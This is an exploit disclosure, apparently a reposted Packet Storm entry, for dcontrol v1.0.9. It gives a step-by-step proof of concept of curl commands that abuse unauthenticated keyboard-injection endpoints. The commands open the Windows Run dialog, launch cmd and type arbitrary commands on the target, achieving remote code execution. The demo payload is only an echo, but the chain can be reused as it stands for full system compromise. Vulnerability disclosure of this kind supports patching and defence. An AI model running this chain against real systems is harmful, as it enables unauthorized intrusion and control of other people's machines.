## https://sploitus.com/exploit?id=PACKETSTORM:219250
# Exploit Title: dcontrol v1.0.9 - Remote Code Execution via Keyboard
Injection
# Date: 2026-04-18
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/dhjz/dcontrol
# Software Link:
https://github.com/dhjz/dcontrol/releases/download/1.0.9/dcontrol.exe
# Version: 1.0.9
# Tested on: Windows 10, Windows 11
# Description:
dcontrol v1.0.9 is vulnerable to unauthenticated Remote Code Execution (RCE)
via keyboard input injection. The /control-api/monitor/sendkey and
/control-api/monitor/sendtext endpoints allow an unauthenticated attacker to
simulate keyboard input on the target system. By chaining these endpoints,
an
attacker can open the Run dialog, launch a command prompt, and execute
arbitrary
commands, leading to complete system compromise.
# Proof of Concept:
# Step 1 - Open Windows Run dialog (Win+R)
curl "http://192.168.1.102:666/control-api/monitor/sendkey?key=LWIN,R"
# Step 2 - Wait 1 second
sleep 1
# Step 3 - Type "cmd"
curl "http://192.168.1.102:666/control-api/monitor/sendtext?val=cmd"
# Step 4 - Press Enter to open CMD
curl "http://192.168.1.102:666/control-api/monitor/sendkey?key=ENTER"
# Step 5 - Wait 1 second for CMD to open
sleep 1
# Step 6 - Type echo command into CMD
curl "
http://192.168.1.102:666/control-api/monitor/sendtext?val=echo%20this%20a%20poc%20only
"
# Step 7 - Press Enter
curl "http://192.168.1.102:666/control-api/monitor/sendkey?key=ENTER"
# Impact:
An unauthenticated attacker can execute arbitrary commands on the target
system
by simulating keyboard input, leading to complete system compromise.